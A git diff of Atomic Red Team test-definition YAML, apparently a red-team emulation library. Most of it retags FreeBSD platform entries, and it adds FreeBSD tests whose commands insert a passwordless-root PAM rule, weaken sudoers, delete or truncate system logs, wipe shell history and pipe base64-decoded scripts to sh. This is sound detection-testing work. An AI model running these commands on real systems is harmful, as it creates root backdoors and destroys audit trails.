input_arguments: output_file: description: Output file path @@ -81207,7 +81146,7 @@ collection: syslog.\n\nTo gain persistence the command could be added to the users .shrc or .profile \n" supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'This test requires to be run in a bash shell and that logger @@ -81241,7 +81180,6 @@ collection: persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ \n" supported_platforms: - - linux:freebsd - linux dependency_executor_name: sh dependencies: @@ -81828,7 +81766,7 @@ collection: ' supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Location to save downloaded discovery.bat file @@ -82719,7 +82657,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -82756,7 +82693,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -82793,7 +82729,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -82830,7 +82765,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -87659,7 +87593,7 @@ credential-access: Upon successful execution, this test will insert a rule that allows every user to su to root without a password. supported_platforms: - - linux:freebsd + - linux input_arguments: path_to_pam_conf: description: PAM config file to modify. @@ -87935,7 +87869,7 @@ credential-access: syslog.\n\nTo gain persistence the command could be added to the users .shrc or .profile \n" supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'This test requires to be run in a bash shell and that logger @@ -87969,7 +87903,6 @@ credential-access: persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ \n" supported_platforms: - - linux:freebsd - linux dependency_executor_name: sh dependencies: @@ -88448,7 +88381,7 @@ credential-access: the sudo_bruteforce.sh which brute force guesses the password, then deletes the user\n" supported_platforms: - - linux:freebsd + - linux input_arguments: remote_url: description: url of remote payload @@ -90117,7 +90050,7 @@ credential-access: copy process memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted. supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Path where captured results will be placed @@ -90162,7 +90095,6 @@ credential-access: copy a process's heap memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted. supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -90468,7 +90400,7 @@ credential-access: Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. supported_platforms: - - linux:freebsd + - linux input_arguments: interface: description: Specify interface to perform PCAP on. @@ -90706,7 +90638,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: ifname: description: Specify interface to perform PCAP on. @@ -90747,7 +90679,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: ifname: description: Specify interface to perform PCAP on. @@ -92871,9 +92803,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: search_path: description: Path where to start searching from. @@ -92924,7 +92855,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: search_path: description: Path where to start searching from. @@ -92986,7 +92917,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: search_path: description: Path where to start searching from. @@ -93048,7 +92979,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: search_path: description: Path where to start searching from @@ -95022,7 +94953,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Path where captured results will be placed @@ -95128,7 +95059,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - macos - linux input_arguments: @@ -95158,9 +95088,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_path: description: Path to search @@ -95204,9 +95133,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_path: description: Path to search @@ -96457,7 +96385,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: target_host: description: IP Address / Hostname you want to target. @@ -97138,7 +97066,7 @@ credential-access: auto_generated_guid: 5076874f-a8e6-4077-8ace-9e5ab54114a5 description: "/etc/master.passwd file is accessed in FreeBSD environments\n" supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Path where captured results will be placed @@ -97157,7 +97085,6 @@ credential-access: auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d description: "/etc/passwd file is accessed in FreeBSD and Linux environments\n" supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -97179,7 +97106,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -97203,7 +97129,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -99059,7 +98984,6 @@ discovery: Upon successful execution, sh will stdout list of usernames. supported_platforms: - - linux:freebsd - linux - macos executor: @@ -100288,7 +100212,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -100307,7 +100230,6 @@ discovery: auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 description: "(requires root)\n" supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -100331,7 +100253,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -100354,7 +100275,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -100411,7 +100331,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Path where captured results will be placed @@ -100431,7 +100351,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -100614,7 +100533,7 @@ discovery: Detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -101153,7 +101072,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'service -e @@ -101283,7 +101202,7 @@ discovery: Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. supported_platforms: - - linux:freebsd + - linux input_arguments: interface: description: Specify interface to perform PCAP on. @@ -101521,7 +101440,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux input_arguments: ifname: description: Specify interface to perform PCAP on. @@ -101562,7 +101481,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux input_arguments: ifname: description: Specify interface to perform PCAP on. @@ -101861,7 +101780,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux input_arguments: package_checker: description: Package checking command. pkg info -x samba @@ -102197,7 +102116,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -102258,7 +102176,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux executor: command: | kldstat | grep -i "vmm" @@ -102283,7 +102201,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -102357,9 +102274,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'env @@ -102588,7 +102504,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux executor: command: | kldstat @@ -103128,7 +103044,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -103193,7 +103108,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Path where captured results will be placed. @@ -103405,7 +103320,7 @@ discovery: Upon successful execution, sh will spawn multiple commands and output will be via stdout. supported_platforms: - - linux:freebsd + - linux executor: command: | if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi; @@ -104003,9 +103918,8 @@ discovery: https://perishablepress.com/list-files-folders-recursively-terminal/ supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: output_file: description: Output file used to store the results. @@ -104031,9 +103945,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: output_file: description: Output file used to store the results. @@ -104225,7 +104138,6 @@ discovery: Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout. supported_platforms: - - linux:freebsd - linux - macos dependency_executor_name: sh @@ -104575,7 +104487,6 @@ discovery: Upon successful execution, sh will execute ps and output to /tmp/loot.txt. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -104793,9 +104704,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: | if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; @@ -105024,7 +104934,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'cat /etc/pam.d/passwd @@ -105305,7 +105215,6 @@ discovery: Upon successful execution, the output will contain the environment variables that indicate the 5 character locale that can be looked up to correlate the language and territory. supported_platforms: - - linux:freebsd - linux executor: command: 'locale @@ -105363,7 +105272,6 @@ discovery: also used as a builtin command that does not generate syscall telemetry but does provide a list of the environment variables. supported_platforms: - - linux:freebsd - linux dependency_executor_name: sh dependencies: @@ -105739,7 +105647,7 @@ discovery: Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. supported_platforms: - - linux:freebsd + - linux executor: command: 'pgrep -l ''bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd'' @@ -106104,7 +106012,6 @@ discovery: Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. supported_platforms: - - linux:freebsd - linux - macos dependency_executor_name: sh @@ -106130,7 +106037,6 @@ discovery: Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -106324,7 +106230,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'netstat -r | grep default @@ -106603,7 +106509,7 @@ discovery: Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout. supported_platforms: - - linux:freebsd + - linux input_arguments: host: description: Host to scan. @@ -107186,7 +107092,7 @@ discovery: description: "Identify system time. Upon execution, the local computer system time and timezone will be displayed. \n" supported_platforms: - - linux:freebsd + - linux - macos executor: command: 'date @@ -113671,7 +113577,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: pwd_for_encrypted_file: @@ -113717,7 +113622,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: pwd_for_encrypted_file: @@ -113756,7 +113660,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: cped_file_path: @@ -113807,7 +113710,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: private_key_path: @@ -114349,9 +114251,8 @@ impact: This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'yes > /dev/null @@ -114549,7 +114450,6 @@ impact: Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -115231,9 +115131,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: timeout: description: Time to restart (can be minutes or specific time) @@ -115251,9 +115150,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: timeout: description: Time to shutdown (can be minutes or specific time) @@ -115271,9 +115169,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'reboot @@ -115286,7 +115183,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux executor: command: 'halt -p @@ -115300,7 +115196,7 @@ impact: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'halt -r @@ -115326,7 +115222,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux executor: command: 'poweroff @@ -115340,7 +115235,7 @@ impact: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'poweroff -r 3 @@ -117508,7 +117403,7 @@ initial-access: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -117549,7 +117444,7 @@ initial-access: the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.\n" supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -117591,7 +117486,7 @@ initial-access: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -118137,7 +118032,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: input_file: description: Test file to upload @@ -118316,7 +118210,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: domain: description: target SSH domain @@ -118338,7 +118231,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: user_name: description: username for domain @@ -118738,7 +118630,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: file_name: description: File name @@ -119022,7 +118913,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd executor: steps: | 1. Victim System Configuration: @@ -119069,7 +118959,6 @@ exfiltration: ' supported_platforms: - - linux:freebsd - linux executor: steps: "1. On the adversary machine run the below command.\n\n tshark -f @@ -119253,7 +119142,7 @@ exfiltration: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: false diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml index a4d91cbd89..5b2a9c0bdd 100644 --- a/atomics/Indexes/linux-index.yaml +++ b/atomics/Indexes/linux-index.yaml @@ -669,6 +669,36 @@ defense-evasion: ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} + ' + - name: Malicious PAM rule (freebsd) + auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3 + description: | + Inserts a rule into a PAM config and then tests it. + + Upon successful execution, this test will insert a rule that allows every user to su to root without a password. + supported_platforms: + - linux + input_arguments: + path_to_pam_conf: + description: PAM config file to modify. + type: string + default: "/etc/pam.d/su" + pam_rule: + description: Rule to add to the PAM config. + type: string + default: auth sufficient pam_succeed_if.so uid >= 0 + index: + description: Index where the rule is inserted. + type: integer + default: 8 + executor: + name: sh + elevation_required: true + command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} + + ' + cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf} + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 @@ -921,9 +951,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: numeric_mode: description: Specified numeric mode value @@ -945,9 +974,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: symbolic_mode: description: Specified symbolic mode value @@ -969,9 +997,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: numeric_mode: description: Specified numeric mode value @@ -993,9 +1020,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: symbolic_mode: description: Specified symbolic mode value @@ -1070,9 +1096,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: owner: description: Username of desired owner @@ -1127,6 +1152,24 @@ defense-evasion: ' name: sh + - name: chflags - Remove immutable file attribute + auto_generated_guid: 60eee3ea-2ebd-453b-a666-c52ce08d2709 + description: | + Remove's a file's `immutable` attribute using `chflags`. + This technique was used by the threat actor Rocke during the compromise of Linux web servers. + supported_platforms: + - linux + input_arguments: + file_to_modify: + description: Path of the file + type: path + default: "/tmp/T1222.002.txt" + executor: + command: | + touch #{file_to_modify} + chflags simmutable #{file_to_modify} + chflags nosimmutable #{file_to_modify} + name: sh - name: Chmod through c script auto_generated_guid: 973631cf-6680-4ffa-a053-045e1b6b67ab description: 'chmods a file using a c script @@ -1158,6 +1201,36 @@ defense-evasion: executor: command: "#{compiled_file} /tmp/ T1222002\n" name: sh + - name: Chmod through c script (freebsd) + auto_generated_guid: da40b5fe-3098-4b3b-a410-ff177e49ee2e + description: 'chmods a file using a c script + + ' + supported_platforms: + - linux + input_arguments: + source_file: + description: Path of c source file + type: path + default: PathToAtomicsFolder/T1222.002/src/T1222.002.c + compiled_file: + description: Path of compiled file + type: path + default: "/tmp/T1222002" + dependency_executor_name: sh + dependencies: + - description: 'Compile the script from (#{source_file}). Destination is #{compiled_file} + + ' + prereq_command: 'cc #{source_file} -o #{compiled_file} + + ' + get_prereq_command: 'cc #{source_file} -o #{compiled_file} + + ' + executor: + command: "#{compiled_file} /tmp/ T1222002\n" + name: sh - name: Chown through c script auto_generated_guid: 18592ba1-5f88-4e3c-abc8-ab1c6042e389 description: 'chowns a file to root using a c script @@ -1192,6 +1265,37 @@ defense-evasion: ' name: sh elevation_required: true + - name: Chown through c script (freebsd) + auto_generated_guid: eb577a19-b730-4918-9b03-c5edcf51dc4e + description: 'chowns a file to root using a c script + + ' + supported_platforms: + - linux + input_arguments: + source_file: + description: Path of c source file + type: path + default: PathToAtomicsFolder/T1222.002/src/chown.c + compiled_file: + description: Path of compiled file + type: path + default: "/tmp/T1222002own" + dependency_executor_name: sh + dependencies: + - description: 'Compile the script from (#{source_file}). Destination is #{compiled_file} + + ' + prereq_command: 'cc #{source_file} -o #{compiled_file} + + ' + get_prereq_command: 'cc #{source_file} -o #{compiled_file} + + ' + executor: + command: "#{compiled_file} #{source_file}\n" + name: sh + elevation_required: true T1216.001: technique: x_mitre_platforms: @@ -2037,6 +2141,27 @@ defense-evasion: name: sh elevation_required: true command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" + - name: Sudo usage (freebsd) + auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1 + description: 'Common Sudo enumeration methods. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if sudo is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y sudo)\n" + executor: + name: sh + elevation_required: true + command: "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n" - name: Unlimited sudo cache timeout auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc description: 'Sets sudo caching timestamp_timeout to a value for unlimited. @@ -2053,6 +2178,31 @@ defense-evasion: command: | sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers sudo visudo -c -f /etc/sudoers + - name: Unlimited sudo cache timeout (freebsd) + auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991 + description: 'Sets sudo caching timestamp_timeout to a value for unlimited. + This is dangerous to modify without using ''visudo'', do not do this on a + production system. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if sudo is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y sudo)\n" + executor: + name: sh + elevation_required: true + command: | + sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers + sudo visudo -c -f /usr/local/etc/sudoers - name: Disable tty_tickets for sudo caching auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous @@ -2068,6 +2218,30 @@ defense-evasion: command: | sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" sudo visudo -c -f /etc/sudoers + - name: Disable tty_tickets for sudo caching (freebsd) + auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a + description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous + to modify without using ''visudo'', do not do this on a production system. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if sudo is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y sudo)\n" + executor: + name: sh + elevation_required: true + command: | + sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers" + sudo visudo -c -f /usr/local/etc/sudoers T1578: technique: x_mitre_platforms: @@ -2602,7 +2776,6 @@ defense-evasion: supported_platforms: - macos - linux - - linux:freebsd input_arguments: test_message: description: Test message to echo out to the screen @@ -3262,6 +3435,20 @@ defense-evasion: command: | if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi; if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi; + - name: Detect Virtualization Environment (FreeBSD) + auto_generated_guid: e129d73b-3e03-4ae9-bf1e-67fc8921e0fd + description: | + Detects execution in a virtualized environment. + At boot, dmesg stores a log if a hypervisor is detected. + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: 'if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization + Environment detected"; fi + + ' T1070.002: technique: x_mitre_platforms: @@ -3347,6 +3534,75 @@ defense-evasion: if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi name: sh elevation_required: true + - name: rm -rf + auto_generated_guid: bd8ccc45-d632-481e-b7cf-c467627d68f9 + description: 'Delete messages and security logs + + ' + supported_platforms: + - linux + executor: + command: | + rm -rf /var/log/messages + rm -rf /var/log/security + name: sh + elevation_required: true + - name: Truncate system log files via truncate utility (freebsd) + auto_generated_guid: 14033063-ee04-4eaf-8f5d-ba07ca7a097c + description: 'This test truncates the system log files using the truncate utility + with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying + the file content + + ' + supported_platforms: + - linux + executor: + command: "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate + --size=0 /var/log/security #size parameter \n" + name: sh + elevation_required: true + - name: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) + auto_generated_guid: 369878c6-fb04-48d6-8fc2-da9d97b3e054 + description: 'The first sub-test truncates the log file to zero bytes via /dev/null + and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, + using cat utility + + ' + supported_platforms: + - linux + executor: + command: | + cat /dev/null > /var/log/messages #truncating the file to zero bytes + cat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros) + name: sh + elevation_required: true + - name: Overwrite FreeBSD system log via echo utility + auto_generated_guid: 11cb8ee1-97fb-4960-8587-69b8388ee9d9 + description: 'This test overwrites the contents of system log file with an empty + string using echo utility + + ' + supported_platforms: + - linux + executor: + command: 'echo '''' > /var/log/messages + + ' + name: sh + elevation_required: true + - name: Delete system log files via unlink utility (freebsd) + auto_generated_guid: 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2 + description: 'This test deletes the messages log file using unlink utility + + ' + supported_platforms: + - linux + executor: + command: 'unlink /var/log/messages + + ' + name: sh + elevation_required: true - name: Delete system journal logs via rm and journalctl utilities auto_generated_guid: ca50dd85-81ff-48ca-92e1-61f119cb1dcf description: 'The first sub-test deletes the journal files using rm utility @@ -4253,6 +4509,18 @@ defense-evasion: executor: command: 'rm ~/.bash_history + ' + name: sh + - name: Clear sh history (rm) + auto_generated_guid: 448893f8-1d5d-4ae2-9017-7fcd73a7e100 + description: 'Clears sh history via rm + + ' + supported_platforms: + - linux + executor: + command: 'rm ~/.sh_history + ' name: sh - name: Clear Bash history (echo) @@ -4265,6 +4533,18 @@ defense-evasion: executor: command: 'echo "" > ~/.bash_history + ' + name: sh + - name: Clear sh history (echo) + auto_generated_guid: a4d63cb3-9ed9-4837-9480-5bf6b09a6c96 + description: 'Clears sh history via echo + + ' + supported_platforms: + - linux + executor: + command: 'echo "" > ~/.sh_history + ' name: sh - name: Clear Bash history (cat dev/null) @@ -4278,6 +4558,18 @@ defense-evasion: executor: command: 'cat /dev/null > ~/.bash_history + ' + name: sh + - name: Clear sh history (cat dev/null) + auto_generated_guid: ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc + description: 'Clears sh history via cat /dev/null + + ' + supported_platforms: + - linux + executor: + command: 'cat /dev/null > ~/.sh_history + ' name: sh - name: Clear Bash history (ln dev/null) @@ -4291,6 +4583,18 @@ defense-evasion: executor: command: 'ln -sf /dev/null ~/.bash_history + ' + name: sh + - name: Clear sh history (ln dev/null) + auto_generated_guid: 3126aa7a-8768-456f-ae05-6ab2d4accfdd + description: 'Clears sh history via a symlink to /dev/null + + ' + supported_platforms: + - linux + executor: + command: 'ln -sf /dev/null ~/.sh_history + ' name: sh - name: Clear Bash history (truncate) @@ -4303,6 +4607,18 @@ defense-evasion: executor: command: 'truncate -s0 ~/.bash_history + ' + name: sh + - name: Clear sh history (truncate) + auto_generated_guid: e14d9bb0-c853-4503-aa89-739d5c0a5818 + description: 'Clears sh history via truncate + + ' + supported_platforms: + - linux + executor: + command: 'truncate -s0 ~/.sh_history + ' name: sh - name: Clear history of a bunch of shells @@ -4320,6 +4636,22 @@ defense-evasion: export HISTFILESIZE=0 history -c name: sh + - name: Clear history of a bunch of shells (freebsd) + auto_generated_guid: 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0 + description: 'Clears the history of a bunch of different shell types by setting + the history size to zero + + ' + supported_platforms: + - linux + executor: + command: | + unset HISTFILE + unset histfile + export HISTFILESIZE=0 + export HISTSIZE=0 + history -c + name: sh - name: Clear and Disable Bash History Logging auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6 description: 'Clears the history and disable bash history logging of the current @@ -4379,6 +4711,33 @@ defense-evasion: ' cleanup_command: 'userdel -f testuser1 + ' + name: sh + - name: Disable sh History Logging with SSH -T (freebsd) + auto_generated_guid: ec3f2306-dd19-4c4b-bed7-92d20e9b1dee + description: 'Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T + keeps the ssh client from catching a proper TTY, which is what usually gets + logged on lastlog + + ' + supported_platforms: + - linux + dependencies: + - description: 'Install sshpass and create user account used for excuting + + ' + prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass + >/dev/null)\n" + get_prereq_command: | + pw useradd testuser1 -g wheel -s /bin/sh + echo 'pwd101!' | pw mod user testuser1 -h 0 + (which pkg && pkg install -y sshpass) + executor: + command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname + + ' + cleanup_command: 'rmuser -y testuser1 + ' name: sh T1202: @@ -4562,7 +4921,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -4600,7 +4958,6 @@ defense-evasion: description: "Use Perl to decode a base64-encoded text string and echo it to the console \n" supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -4661,6 +5018,80 @@ defense-evasion: echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}" + - name: Base64 decoding with shell utilities (freebsd) + auto_generated_guid: b6097712-c42e-4174-b8f2-4b1e1a5bbb3d + description: 'Use common shell utilities to decode a base64-encoded text string + and echo it to the console + + ' + supported_platforms: + - linux + input_arguments: + message: + description: Message to print to the screen + type: string + default: Hello from Atomic Red Team test T1140! + encoded_file: + description: File to temporarily save encoded text + type: path + default: "/tmp/T1140.encoded" + executor: + name: sh + elevation_required: false + command: | + ENCODED=$(echo '#{message}' | b64encode -r -) + printf $ENCODED | b64decode -r + echo $ENCODED | b64decode -r + echo $(echo $ENCODED) | b64decode -r + echo $ENCODED > #{encoded_file} && b64encode -r #{encoded_file} + echo $ENCODED > #{encoded_file} && b64decode -r < #{encoded_file} + echo $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r + echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r + - name: FreeBSD b64encode Shebang in CLI + auto_generated_guid: 18ee2002-66e8-4518-87c5-c0ec9c8299ac + description: "Using b64decode shell scripts that have Shebang in them. This + is commonly how attackers obfuscate passing and executing a shell script. + Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) + by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). + Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) + for it. \n" + supported_platforms: + - linux + input_arguments: + bash_encoded: + description: Encoded + type: string + default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= + dash_encoded: + description: Encoded + type: string + default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= + fish_encoded: + description: Encoded + type: string + default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= + sh_encoded: + description: Encoded + type: string + default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK + dependencies: + - description: 'b64decode must be present + + ' + prereq_command: 'which b64decode + + ' + get_prereq_command: 'echo "please install b64decode" + + ' + executor: + name: sh + elevation_required: false + command: | + echo #{bash_encoded} | b64decode -r | sh + echo #{dash_encoded} | b64decode -r | sh + echo #{fish_encoded} | b64decode -r | sh + echo #{sh_encoded} | b64decode -r | sh - name: Hex decoding with shell utilities auto_generated_guid: '005943f9-8dd5-4349-8b46-0313c0a9f973' description: 'Use common shell utilities to decode a hex-encoded text string @@ -4668,7 +5099,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5579,7 +6009,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5611,7 +6040,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos 